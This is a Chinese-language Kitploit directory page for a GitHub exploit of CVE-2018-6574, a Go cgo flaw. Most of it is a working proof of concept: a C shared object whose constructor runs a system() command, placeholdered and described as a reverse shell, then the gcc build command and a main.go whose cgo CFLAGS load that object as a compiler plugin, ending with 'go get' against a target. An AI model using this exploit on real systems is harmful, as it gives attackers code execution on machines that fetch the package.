Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-6574 — 针对 CVE-2018-6574 的 Golang cgo 漏洞利用 | Kitploit
工具/GitHubGitHub/paulogmota/cve-2018-6574
漏洞分析漏洞利用Shellcode渗透测试Payload 开发二进制利用
GitHubpaulogmota/cve-2018-6574

CVE-2018-6574

针对 CVE-2018-6574 的 Golang cgo 漏洞利用

查看仓库
61年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-6574

复现步骤:

  1. 创建一个包含恶意命令(反向 shell)的 .c 文件:
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
  system("<insert your command here>");
}
  1. 使用 GCC 编译它。你必须在与目标完全相同的架构和操作系统上进行编译(例如 Linux x86_64):
gcc -shared -o attack.so -fPIC attack.c
  1. 创建一个 main.go 文件,其中包含告诉 Go 使用我们恶意插件的头文件:
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
//   return f();
// }
//
// int fortytwo(){
//   return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
  1. 将 main.go 和 attack.so 文件托管到 GitHub 仓库中
  2. 在目标机器上运行命令 go get github.com/<your-handle>/<your-hepo>
  3. 尽情享受吧
下载工具